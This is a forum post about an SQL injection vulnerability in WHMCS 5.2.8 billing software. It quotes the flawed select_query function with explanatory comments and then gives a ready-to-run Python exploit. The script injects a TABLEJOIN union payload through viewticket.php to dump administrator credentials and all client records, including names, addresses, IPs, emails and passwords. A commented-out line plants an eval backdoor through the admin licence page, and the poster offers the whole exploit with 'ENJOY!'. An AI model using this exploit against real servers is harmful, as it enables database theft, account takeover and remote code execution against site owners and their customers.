WHMCS 5.2.8 Vulnerability

2013-10-20 18:02:11 4 664
Here we go again: poor WHMCS — the new version got exploited again!

This time it is again the same mistake, in

/includes/dbfunctions.php

We can manipulate the GET/POST variables and end up with something like $key = array('sqltype' => 'TABLEJOIN', 'value' => '[SQLI]');

From this vulnerability
we can even change /configuration.php to whatever we want (PHP code included).
<?php
/**
 * Builds a SELECT statement by string concatenation from the caller-supplied parts.
 *
 * Only the part of the function visible in this excerpt is documented; the body
 * is truncated after the array-valued $where branch, so the handling of scalar
 * criteria, $orderby, $orderbyorder, $limit and the actual query execution is
 * not shown here.
 *
 * Security-relevant shape of what IS visible:
 *  - $fields is spliced in with no escaping at all.
 *  - $innerjoin is run through db_escape_string() and spliced in unquoted.
 *  - For array criteria the operator branches >, <, <=, >= and TABLEJOIN splice
 *    the value UNQUOTED; db_escape_string() (presumably quote/backslash escaping,
 *    its definition is not on this page) therefore does not confine the value
 *    to a literal, which is exactly the write-up's vector when request arrays
 *    such as tid[sqltype]/tid[value] are forwarded into $where.
 *  - The <= and >= branches use the raw $origkey instead of the sanitised $key.
 *
 * Defensive direction: do not forward request parameters into $where as arrays
 * (reject array-valued inputs where a scalar is expected at the boundary), and
 * bind or cast values in the unquoted branches (prepared statements) rather than
 * relying on string escaping.
 *
 * @param string $table        table name; passed through db_make_safe_field()
 * @param string $fields       column list, concatenated as-is ('*' when falsy)
 * @param mixed  $where        WHERE criteria; when an array, column => scalar or
 *                             column => array('sqltype' => ..., 'value' => ...)
 *                             (or 'values' => array for sqltype 'IN')
 * @param string $orderby      not reached within this excerpt
 * @param string $orderbyorder not reached within this excerpt
 * @param string $limit        not reached within this excerpt
 * @param string $innerjoin    join clause text; escaped, never quoted — must be
 *                             trusted SQL, never user input
 */
function select_query($table, $fields, $where, $orderby = '', $orderbyorder = '', $limit = '', $innerjoin = '') {
    // None of these globals is referenced within the visible part of the body.
    global $CONFIG;
    global $query_count;
    global $mysql_errors;
    global $whmcsmysql;
    // A falsy column list selects every column.
    if (!$fields) {
    $fields = '*';
    }
    // $fields is concatenated raw; only $table goes through db_make_safe_field().
    $query = 'SELECT ' . $fields . ' FROM ' . db_make_safe_field($table);
    if ($innerjoin) {
    // Escaped but unquoted: escaping cannot confine free-form SQL text here.
    $query .= ' INNER JOIN ' . db_escape_string($innerjoin);
    }
    if ($where) {
    if (is_array($where)) {
        $criteria = array();
        foreach ($where as $origkey => $value) {
        // Column name sanitised once here; note the <= / >= branches below use $origkey.
        $key = db_make_safe_field($origkey);
        if (is_array($value)) {
            // `default` is a reserved word and needs backticks.
            if ($key == 'default') {
            $key = '`default`';
            }
            // LIKE / NEQ: value is quoted, so escaping keeps it inside the literal.
            if ($value['sqltype'] == 'LIKE') {
            $criteria[] = $key . ' LIKE \'%' . db_escape_string($value['value']) . '%\'';
            continue;
            }
            if ($value['sqltype'] == 'NEQ') {
            $criteria[] = $key . '!=\'' . db_escape_string($value['value']) . '\'';
            continue;
            }
            // The comparison and TABLEJOIN branches below splice the value UNQUOTED.
            // Quote escaping does not restrict what can appear in this position.
            if ($value['sqltype'] == '>') {
            $criteria[] = $key . '>' . db_escape_string($value['value']);
            continue;
            }
            if ($value['sqltype'] == '<') {
            $criteria[] = $key . '<' . db_escape_string($value['value']);
            continue;
            }
            // Uses the raw $origkey rather than the sanitised $key.
            if ($value['sqltype'] == '<=') {
            $criteria[] = $origkey . '<=' . db_escape_string($value['value']);
            continue;
            }
            // Uses the raw $origkey rather than the sanitised $key.
            if ($value['sqltype'] == '>=') {
            $criteria[] = $origkey . '>=' . db_escape_string($value['value']);
            continue;
            }
            // Unquoted equality; this is the sqltype named in the write-up above.
            if ($value['sqltype'] == 'TABLEJOIN') {
            $criteria[] = $key . '=' . db_escape_string($value['value']);
            continue;
            }
            // IN: each element escaped via db_escape_array() and wrapped in quotes.
            if ($value['sqltype'] == 'IN') {
            $criteria[] = $key . ' IN (\'' . implode('\',\'', db_escape_array($value['values'])) . '\')';
            continue;
            }
            // Unknown sqltype: the criterion is silently dropped, so it narrows nothing.
            continue;
        }
[...]
?>
?>
SO Re-edit Your Previous WHMCS.py exploit script and ENJOY!

Exp:
#!/usr/bin/env python
# 2013/10/18 - WHMCS <=5.2.8 SQL Injection
# [url]http://localhost.re/p/whmcs-528-vulnerability[/url]

url = 'http://client.target.com/'

import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

def exploit(sql):
        sqlUnion = '-1 union select 1,0,0,0,0,0,0,0,0,0,0,%s,0,0,0,0,0,0,0,0,0,0,0#' % sql
        print "Doing stuff: %s" % sqlUnion
        #you could exploit any file that does a select, I randomly chose viewticket.php
        r = urlopen(Request('%sviewticket.php' % url, data="tid[sqltype]=TABLEJOIN&tid[value]=%s" % sqlUnion, headers={"User-agent": ua})).read()
        return re.search(r'<div class="clientmsg">(.*?)</div>', r, re.DOTALL).group(1).strip()

#get admins
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)')

#get users
count = int(exploit('(SELECT COUNT(id) FROM tblclients)'))
print "User count %d" % count
for i in range(count):       
        print exploit('(SELECT CONCAT(id,0x3a,firstname,0x3a,lastname,0x3a,address1,0x3a,address2,0x3a,city,0x3a,country,0x3a,ip,0x3a,email,0x3a,password) FROM tblclients LIMIT %d,1)' % i)

#are you evil? yes, you are!
#php = "1';eval($_REQUEST['lol_whmcs']);#"
#r = urlopen(Request('%sadmin/licenseerror.php?updatekey=true&whitelisted=1&newlicensekey=%s&match=1&username[sqltype]=TABLEJOIN&username[value]=-1||1=1%%23' % (url, urllib.quote_plus(php)), headers={"User-agent": ua})).read()
Original source: WHMCS 5.2.8 Vulnerability - localhost
